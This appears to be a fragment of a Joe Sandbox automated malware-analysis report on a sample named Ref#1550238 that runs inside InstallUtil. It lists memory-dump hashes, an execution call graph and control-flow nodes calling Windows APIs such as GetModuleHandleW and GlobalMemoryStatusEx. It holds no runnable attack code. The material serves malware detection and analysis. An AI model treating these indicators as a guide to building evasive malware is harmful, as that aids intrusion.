                                                                                    • Source File: 00000000.00000002.2526216892.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5e70000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b79261642609117754330329d6f5cbfd3ece6c590ad60ff1e9bb9239c1a921c2
                                                                                    • Instruction ID: f63b6a0474185933fc2b0e66975d80e3bd9a68df10fd477e46bdfba276428034
                                                                                    • Opcode Fuzzy Hash: b79261642609117754330329d6f5cbfd3ece6c590ad60ff1e9bb9239c1a921c2
                                                                                    • Instruction Fuzzy Hash: EF2169B1D056188BEB68CF5BC94979AFAF7AFC9304F14C1E9C44CA6254EB740A858F41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526216892.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5e70000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3563c04377edb3bf76a140ebcf5b48e468d1f9ea9021aed6170752dbdb643a3b
                                                                                    • Instruction ID: 7761d1971840382c7f76592c8b756935696477a07434cc04219cd013fa8bcf98
                                                                                    • Opcode Fuzzy Hash: 3563c04377edb3bf76a140ebcf5b48e468d1f9ea9021aed6170752dbdb643a3b
                                                                                    • Instruction Fuzzy Hash: 71219AB1D056188BEB68CF6BC94979AFBF3AFC9304F14C0E9C44CA6254DB740A868F01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 25af0bf0ff7bd7313313368d249a28329dc55f2b5c088bbc0352c37a47a6f91f
                                                                                    • Instruction ID: 2485515de4fc35c25c4721062f39813271815e05ce9dffc8402b0a9ffb22fb1e
                                                                                    • Opcode Fuzzy Hash: 25af0bf0ff7bd7313313368d249a28329dc55f2b5c088bbc0352c37a47a6f91f
                                                                                    • Instruction Fuzzy Hash: 5621C7B1E056189BEB58CFAAC94439EFAF7AFC8300F04C06AD419AB254DB740946CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 78a46dcd9c29f74d4303d40fa4b28d8bdc303da0d554ae99c6146f81e2664e52
                                                                                    • Instruction ID: 2f7222e89f49c4822b094e18688f3a3ae35de98718fecbe2286b8ad90a56f735
                                                                                    • Opcode Fuzzy Hash: 78a46dcd9c29f74d4303d40fa4b28d8bdc303da0d554ae99c6146f81e2664e52
                                                                                    • Instruction Fuzzy Hash: 0E11AD71E056289BEB58DF6BD8402DDFAF7AFC9310F04C0BA9848A6254DB300995CF44

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.3%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:181
                                                                                    Total number of Limit Nodes:19
                                                                                    execution_graph 39021 3290848 39023 329084e 39021->39023 39022 329091b 39023->39022 39028 6ce1cf0 39023->39028 39032 6ce1d00 39023->39032 39036 3291488 39023->39036 39042 3291383 39023->39042 39029 6ce1d0f 39028->39029 39048 6ce1464 39029->39048 39033 6ce1d0f 39032->39033 39034 6ce1464 5 API calls 39033->39034 39035 6ce1d30 39034->39035 39035->39023 39038 3291396 39036->39038 39039 329148f 39036->39039 39037 3291480 39037->39023 39038->39037 39041 3291488 GlobalMemoryStatusEx 39038->39041 39185 3297ea0 39038->39185 39039->39023 39041->39038 39044 329138b 39042->39044 39045 3291314 39042->39045 39043 3291480 39043->39023 39044->39043 39046 3297ea0 GlobalMemoryStatusEx 39044->39046 39047 3291488 GlobalMemoryStatusEx 39044->39047 39045->39023 39046->39044 39047->39044 39049 6ce146f 39048->39049 39052 6ce2bcc 39049->39052 39051 6ce36b6 39051->39051 39053 6ce2bd7 39052->39053 39054 6ce3ddc 39053->39054 39057 6ce5a66 39053->39057 39061 6ce5a68 39053->39061 39054->39051 39058 6ce5a89 39057->39058 39059 6ce5aad 39058->39059 39065 6ce5c18 39058->39065 39059->39054 39063 6ce5a89 39061->39063 39062 6ce5aad 39062->39054 39063->39062 39064 6ce5c18 5 API calls 39063->39064 39064->39062 39067 6ce5c25 39065->39067 39066 6ce5c5e 39066->39059 39067->39066 39069 6ce4e28 39067->39069 39070 6ce4e33 39069->39070 39072 6ce5cd0 39070->39072 39073 6ce4e5c 39070->39073 39072->39072 39074 6ce4e67 39073->39074 39080 6ce4e6c 39074->39080 39076 6ce5d79 39076->39072 39079 6ce5d3f 39084 6ceb050 39079->39084 39093 6ceb038 39079->39093 39083 6ce4e77 39080->39083 39081 6ce6fc8 39081->39079 39082 6ce5a68 5 API calls 39082->39081 39083->39081 39083->39082 39086 6ceb081 39084->39086 39088 6ceb181 39084->39088 39085 6ceb08d 39085->39076 39086->39085 39102 6ceb2c8 39086->39102 39106 6ceb2b8 39086->39106 39087 6ceb0cd 39110 6cec5c8 39087->39110 39123 6cec5b9 39087->39123 39088->39076 39095 6ceb081 39093->39095 39097 6ceb181 39093->39097 39094 6ceb08d 39094->39076 39095->39094 39098 6ceb2c8 3 API calls 39095->39098 39099 6ceb2b8 3 API calls 39095->39099 39096 6ceb0cd 39100 6cec5c8 3 API calls 39096->39100 39101 6cec5b9 3 API calls 39096->39101 39097->39076 39098->39096 39099->39096 39100->39097 39101->39097 39136 6ceb308 39102->39136 39146 6ceb318 39102->39146 39103 6ceb2d2 39103->39087 39107 6ceb2d2 39106->39107 39108 6ceb308 2 API calls 39106->39108 39109 6ceb318 2 API calls 39106->39109 39107->39087 39108->39107 39109->39107 39111 6cec5f3 39110->39111 39156 6cea37c 39111->39156 39114 6cec676 39117 6cec6a2 39114->39117 39171 6cea2ac 39114->39171 39118 6cea37c GetModuleHandleW 39118->39114 39124 6cec5f3 39123->39124 39125 6cea37c GetModuleHandleW 39124->39125 39126 6cec65a 39125->39126 39131 6cea37c GetModuleHandleW 39126->39131 39132 6ceca78 GetModuleHandleW 39126->39132 39133 6cecb20 GetModuleHandleW 39126->39133 39127 6cec676 39128 6cea2ac GetModuleHandleW 39127->39128 39130 6cec6a2 39127->39130 39129 6cec6e6 39128->39129 39134 6ced490 2 API calls 39129->39134 39135 6ced4a0 CreateWindowExW 39129->39135 39131->39127 39132->39127 39133->39127 39134->39130 39135->39130 39137 6ceb30d 39136->39137 39138 6cea2ac GetModuleHandleW 39137->39138 39140 6ceb34c 39137->39140 39139 6ceb334 39138->39139 39139->39140 39144 6ceb5b0 GetModuleHandleW 39139->39144 39145 6ceb5a1 GetModuleHandleW 39139->39145 39140->39103 39141 6ceb344 39141->39140 39142 6ceb550 GetModuleHandleW 39141->39142 39143 6ceb57d 39142->39143 39143->39103 39144->39141 39145->39141 39147 6ceb329 39146->39147 39150 6ceb34c 39146->39150 39148 6cea2ac GetModuleHandleW 39147->39148 39149 6ceb334 39148->39149 39149->39150 39154 6ceb5b0 GetModuleHandleW 39149->39154 39155 6ceb5a1 GetModuleHandleW 39149->39155 39150->39103 39151 6ceb344 39151->39150 39152 6ceb550 GetModuleHandleW 39151->39152 39153 6ceb57d 39152->39153 39153->39103 39154->39151 39155->39151 39157 6cea387 39156->39157 39158 6cec65a 39157->39158 39159 6cecc80 GetModuleHandleW 39157->39159 39160 6cecc90 GetModuleHandleW 39157->39160 39158->39118 39161 6ceca78 39158->39161 39166 6cecb20 39158->39166 39159->39158 39160->39158 39162 6ceca88 39161->39162 39163 6ceca93 39162->39163 39164 6cecc80 GetModuleHandleW 39162->39164 39165 6cecc90 GetModuleHandleW 39162->39165 39163->39114 39164->39163 39165->39163 39168 6cecb4d 39166->39168 39167 6cecbce 39168->39167 39169 6cecc80 GetModuleHandleW 39168->39169 39170 6cecc90 GetModuleHandleW 39168->39170 39169->39167 39170->39167 39172 6ceb508 GetModuleHandleW 39171->39172 39174 6ceb57d 39172->39174 39175 6ced4a0 39174->39175 39178 6ced490 39174->39178 39176 6ced4d5 39175->39176 39177 6cea464 CreateWindowExW 39175->39177 39176->39117 39177->39176 39179 6ced4a6 39178->39179 39182 6ced4de CreateWindowExW 39178->39182 39180 6cea464 CreateWindowExW 39179->39180 39181 6ced4d5 39180->39181 39181->39117 39184 6ced614 39182->39184 39186 3297eaa 39185->39186 39187 3297ec4 39186->39187 39190 6cffaa9 39186->39190 39194 6cffab8 39186->39194 39187->39038 39191 6cffacd 39190->39191 39192 6cffce2 39191->39192 39193 6cffcf7 GlobalMemoryStatusEx 39191->39193 39192->39187 39193->39191 39196 6cffacd 39194->39196 39195 6cffce2 39195->39187 39196->39195 39197 6cffcf7 GlobalMemoryStatusEx 39196->39197 39197->39196 39198 6ce2e08 39199 6ce2e4e 39198->39199 39203 6ce2fd8 39199->39203 39208 6ce2fe8 39199->39208 39200 6ce2f3b 39204 6ce2fb2 39203->39204 39205 6ce2fe2 39203->39205 39204->39200 39211 6ce29e4 39205->39211 39209 6ce29e4 DuplicateHandle 39208->39209 39210 6ce3016 39209->39210 39210->39200 39212 6ce3050 DuplicateHandle 39211->39212 39213 6ce3016 39212->39213 39213->39200 39226 186d030 39227 186d048 39226->39227 39228 186d0a2 39227->39228 39229 6cea48c CallWindowProcW 39227->39229 39233 6ced697 39227->39233 39237 6cee7f8 39227->39237 39241 6ced6a8 39227->39241 39229->39228 39234 6ced6a5 39233->39234 39235 6cea48c CallWindowProcW 39234->39235 39236 6ced6ef 39235->39236 39236->39228 39238 6cee835 39237->39238 39240 6cee859 39238->39240 39245 6cee46c CallWindowProcW 39238->39245 39240->39240 39242 6ced6ce 39241->39242 39243 6cea48c CallWindowProcW 39242->39243 39244 6ced6ef 39243->39244 39244->39228 39245->39240 39214 6cefc00 39215 6cefc1c 39214->39215 39216 6cefd1c 39215->39216 39217 6cefc72 39215->39217 39221 6cea48c 39216->39221 39219 6cefcca CallWindowProcW 39217->39219 39220 6cefc79 39217->39220 39219->39220 39223 6cea497 39221->39223 39224 6cee859 39223->39224 39225 6cee46c CallWindowProcW 39223->39225 39224->39224 39225->39224
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f50457db28317c462061ab241681199aa16b1e5f8714168de5e324ffd420b1af
                                                                                    • Instruction ID: c2a22060e2f58613157d6e69d2e8123b5b7519ebcf47d79cfd94210bd157db2f
                                                                                    • Opcode Fuzzy Hash: f50457db28317c462061ab241681199aa16b1e5f8714168de5e324ffd420b1af
                                                                                    • Instruction Fuzzy Hash: 9C924830A102048FDBA4CFA8C588A5DBBF2EB45315F5484AED549DB361DB79EE81CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5407a0ea52d4ae1e05d9c3c4d8ecdb65a04f70c356fa0fd9f4f9b3f158f84e96
                                                                                    • Instruction ID: 5eac05f1fc9ca23c447f277772532e74b84b608c2b3c8e782e88ba10f1ad80cd
                                                                                    • Opcode Fuzzy Hash: 5407a0ea52d4ae1e05d9c3c4d8ecdb65a04f70c356fa0fd9f4f9b3f158f84e96
                                                                                    • Instruction Fuzzy Hash: 26629F30B102059FDB94DB69D954BADB7F2EF88310F248469E906DB390DB36ED41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f51144de57763f16e767a89aa7c113202b0f371132b4726ac5b30fe124765ec8
                                                                                    • Instruction ID: a91b61d87a8b0107e0c7e26df9235879f6795499a5c86c16048b681a3df25665
                                                                                    • Opcode Fuzzy Hash: f51144de57763f16e767a89aa7c113202b0f371132b4726ac5b30fe124765ec8
                                                                                    • Instruction Fuzzy Hash: 59328F74B102098FDF94DB68D890BAEBBB6FB88710F10852AD905EB351DB35ED41CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fe73ac53af10c4abedcb138f8a6777f66b6294e44e7b4193c7dff61b8bd8dc48
                                                                                    • Instruction ID: e720436541e444917fcb5f99a90d611025e581de132c8b6c79f4ffe22673ffe8
                                                                                    • Opcode Fuzzy Hash: fe73ac53af10c4abedcb138f8a6777f66b6294e44e7b4193c7dff61b8bd8dc48
                                                                                    • Instruction Fuzzy Hash: 3C12F371F202059BDBA4DB68D88076EB7A6FB95310F64843ADA16DB344DB34EE41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 742b832677c3e6a15b61469cfdf2542b1e00e28e3a0835b116c4b6a19925f730
                                                                                    • Instruction ID: b05b4e735c5fe24183b5352ba12788660da6a2d92e43ddcd18f68a90e7d15ae1
                                                                                    • Opcode Fuzzy Hash: 742b832677c3e6a15b61469cfdf2542b1e00e28e3a0835b116c4b6a19925f730
                                                                                    • Instruction Fuzzy Hash: 4B227370E202099FEFA4CB68D8907ADB7B6FB89310F20852AE515DB351DB35DE81CB51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a76ce3ba4c6d0a041f6bcec8f2607e6fc688f0a8a10f1b9a6a34f0ed23133456
                                                                                    • Instruction ID: 6c560c97019be1dd4b7ec141363846042a76606c93ba358ddc9f5eb098b2b650
                                                                                    • Opcode Fuzzy Hash: a76ce3ba4c6d0a041f6bcec8f2607e6fc688f0a8a10f1b9a6a34f0ed23133456
                                                                                    • Instruction Fuzzy Hash: 99322E35E10759DBDB54DF69C85069DB7B2FFC9300F10D6AAD409AB224EB30AE85CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 002f80ce7c760e2dc007e95120d815d441dd254fd0b069c15de68066a9d6f6fe
                                                                                    • Instruction ID: 01bfac876ec3f0049585a1458a3feb1d9789b50a1e5d17ca64009f601786e9f9
                                                                                    • Opcode Fuzzy Hash: 002f80ce7c760e2dc007e95120d815d441dd254fd0b069c15de68066a9d6f6fe
                                                                                    • Instruction Fuzzy Hash: 56029B30B112158FDB94DB69D890AAEB7F2FF88300F248529D906DB390DB75ED46CB90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 511 6ceb318-6ceb327 512 6ceb329-6ceb336 call 6cea2ac 511->512 513 6ceb353-6ceb357 511->513 518 6ceb34c 512->518 519 6ceb338 512->519 515 6ceb36b-6ceb3ac 513->515 516 6ceb359-6ceb363 513->516 522 6ceb3ae-6ceb3b6 515->522 523 6ceb3b9-6ceb3c7 515->523 516->515 518->513 567 6ceb33e call 6ceb5b0 519->567 568 6ceb33e call 6ceb5a1 519->568 522->523 524 6ceb3eb-6ceb3ed 523->524 525 6ceb3c9-6ceb3ce 523->525 527 6ceb3f0-6ceb3f7 524->527 528 6ceb3d9 525->528 529 6ceb3d0-6ceb3d7 call 6cea2b8 525->529 526 6ceb344-6ceb346 526->518 530 6ceb488-6ceb548 526->530 532 6ceb3f9-6ceb401 527->532 533 6ceb404-6ceb40b 527->533 534 6ceb3db-6ceb3e9 528->534 529->534 562 6ceb54a-6ceb54d 530->562 563 6ceb550-6ceb57b GetModuleHandleW 530->563 532->533 537 6ceb40d-6ceb415 533->537 538 6ceb418-6ceb421 call 6ce3934 533->538 534->527 537->538 542 6ceb42e-6ceb433 538->542 543 6ceb423-6ceb42b 538->543 545 6ceb435-6ceb43c 542->545 546 6ceb451-6ceb45e 542->546 543->542 545->546 547 6ceb43e-6ceb44e call 6ce8af8 call 6cea2c8 545->547 552 6ceb460-6ceb47e 546->552 553 6ceb481-6ceb487 546->553 547->546 552->553 562->563 564 6ceb57d-6ceb583 563->564 565 6ceb584-6ceb598 563->565 564->565 567->526 568->526
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 7f933c6d4d04d0ef0593f7fb48ef7f704acffb615d03a35cff5e51e1afcbe55e
                                                                                    • Instruction ID: 03200dc2efe874ba39169f9176e35553d4bc6e30aea58a5523f0def6f3b408fb
                                                                                    • Opcode Fuzzy Hash: 7f933c6d4d04d0ef0593f7fb48ef7f704acffb615d03a35cff5e51e1afcbe55e
                                                                                    • Instruction Fuzzy Hash: 5D814570A00B058FD7A4DF6AD58576ABBF1FF88300F008A2ED49AD7A40DB75E945CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 569 6ced490-6ced4a4 570 6ced4de-6ced556 569->570 571 6ced4a6-6ced4d0 call 6cea464 569->571 575 6ced558-6ced55e 570->575 576 6ced561-6ced568 570->576 574 6ced4d5-6ced4d6 571->574 575->576 577 6ced56a-6ced570 576->577 578 6ced573-6ced612 CreateWindowExW 576->578 577->578 580 6ced61b-6ced653 578->580 581 6ced614-6ced61a 578->581 585 6ced655-6ced658 580->585 586 6ced660 580->586 581->580 585->586 587 6ced661 586->587 587->587
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CED602
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 3b5488cf1e5f5d58c574221c396d8a6c265d164c56b11a19a814e72567fba58c
                                                                                    • Instruction ID: 1951db13762dc47c51644cb91f0488846fb389dd1e79b29841f8d4008244aa53
                                                                                    • Opcode Fuzzy Hash: 3b5488cf1e5f5d58c574221c396d8a6c265d164c56b11a19a814e72567fba58c
                                                                                    • Instruction Fuzzy Hash: 7F51F0B1C00249AFDF11CF99C884ADDBFB6BF49314F24816AE818AB221D771A955CF90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 688 329e998-329e9b3 690 329e9dd-329e9fc call 329e1f4 688->690 691 329e9b5-329e9dc 688->691 696 329e9fe-329ea01 690->696 697 329ea02-329ea61 690->697 704 329ea63-329ea66 697->704 705 329ea67-329eaf4 GlobalMemoryStatusEx 697->705 709 329eafd-329eb25 705->709 710 329eaf6-329eafc 705->710 710->709
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737877182.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_3290000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eddf608d540d060b5c3521c32a52c73f198118b46bb6bb446589ad69033559e4
                                                                                    • Instruction ID: 18871d4e82a5f761d28c9bb7a46b92a2a903dd0c4037ace75b0ee10ff5bf8a7b
                                                                                    • Opcode Fuzzy Hash: eddf608d540d060b5c3521c32a52c73f198118b46bb6bb446589ad69033559e4
                                                                                    • Instruction Fuzzy Hash: 7F415472D1439A9FDB14DFB9D8046AEBBF5AF89210F0985AFD404EB241DB749840CBE1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 713 6cea464-6ced556 715 6ced558-6ced55e 713->715 716 6ced561-6ced568 713->716 715->716 717 6ced56a-6ced570 716->717 718 6ced573-6ced612 CreateWindowExW 716->718 717->718 720 6ced61b-6ced653 718->720 721 6ced614-6ced61a 718->721 725 6ced655-6ced658 720->725 726 6ced660 720->726 721->720 725->726 727 6ced661 726->727 727->727
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CED602
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: a99cab0b7c8df3e689567d8ea03dbe0c63b05130c0b1d919dc9631265c2fedca
                                                                                    • Instruction ID: 4bd073f1a495faac7a54f5a4c9a5e5aff72e89e3da399c4c1717c32193e7c03f
                                                                                    • Opcode Fuzzy Hash: a99cab0b7c8df3e689567d8ea03dbe0c63b05130c0b1d919dc9631265c2fedca
                                                                                    • Instruction Fuzzy Hash: 5851BEB1D003499FDB14CF9AC884ADEBBB5BF88314F64852EE819AB210D771A945CF90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 728 6cee46c-6cefc6c 731 6cefd1c-6cefd3c call 6cea48c 728->731 732 6cefc72-6cefc77 728->732 739 6cefd3f-6cefd4c 731->739 734 6cefcca-6cefd02 CallWindowProcW 732->734 735 6cefc79-6cefcb0 732->735 737 6cefd0b-6cefd1a 734->737 738 6cefd04-6cefd0a 734->738 741 6cefcb9-6cefcc8 735->741 742 6cefcb2-6cefcb8 735->742 737->739 738->737 741->739 742->741
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06CEFCF1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: d4f64f05abf626b3d67aa0abf412922f2003d34df35300a503ab4c949baab76a
                                                                                    • Instruction ID: 7eb8ee17b2b4007e7d46f071ee5f5e46510e5bb56c2d75421393bf9b420c42a0
                                                                                    • Opcode Fuzzy Hash: d4f64f05abf626b3d67aa0abf412922f2003d34df35300a503ab4c949baab76a
                                                                                    • Instruction Fuzzy Hash: C04129B5A00309CFDB54DF99C848AAABBF5FB88314F24845DE919A7321D774A941CFA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 745 6ce29e4-6ce30e4 DuplicateHandle 747 6ce30ed-6ce310a 745->747 748 6ce30e6-6ce30ec 745->748 748->747
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06CE3016,?,?,?,?,?), ref: 06CE30D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: df3c87e18fdb37e1f014d63456f6abfaf395ee6b8396033cbac483a2246bd21c
                                                                                    • Instruction ID: 425fe79b7a848d8fca89934c14a4c184f9f8458772bc4da72db1927c161497db
                                                                                    • Opcode Fuzzy Hash: df3c87e18fdb37e1f014d63456f6abfaf395ee6b8396033cbac483a2246bd21c
                                                                                    • Instruction Fuzzy Hash: 9D21E5B5900249AFDB10CF9AD884AEEBBF4FB48310F14841AE918A7350D375A954CFA4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 751 6ce3048-6ce30e4 DuplicateHandle 752 6ce30ed-6ce310a 751->752 753 6ce30e6-6ce30ec 751->753 753->752
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06CE3016,?,?,?,?,?), ref: 06CE30D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 1a7c45b42beba330bb8ea18215dd645337de38859832e3b11f35e1cf6a95353f
                                                                                    • Instruction ID: a119e2d9a8b2bf989cf93913a6a60b7f29a8b3b355637f06572e69818b769bb2
                                                                                    • Opcode Fuzzy Hash: 1a7c45b42beba330bb8ea18215dd645337de38859832e3b11f35e1cf6a95353f
                                                                                    • Instruction Fuzzy Hash: 7B21E4B5D012499FDB10CFAAD884AEEBBF5FB48310F14801AE918A3350D375A954CFA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 756 329ea80-329eabe 757 329eac6-329eaf4 GlobalMemoryStatusEx 756->757 758 329eafd-329eb25 757->758 759 329eaf6-329eafc 757->759 759->758
                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNELBASE(00000006), ref: 0329EAE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737877182.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_3290000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    • Opcode ID: c1227557051bedd7e81f75b4feee2265d4d62a53308c4d72398bfbff1db2bc0e
                                                                                    • Instruction ID: 7b2719141c98f93130985eac30e7a18edd5229d7a44a2c4ef50a908b5582d5d9
                                                                                    • Opcode Fuzzy Hash: c1227557051bedd7e81f75b4feee2265d4d62a53308c4d72398bfbff1db2bc0e
                                                                                    • Instruction Fuzzy Hash: 1A1120B1C0065A9FDB10DFAAC444BDEFBF4BF48620F15812AE818A7240D778A944CFA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
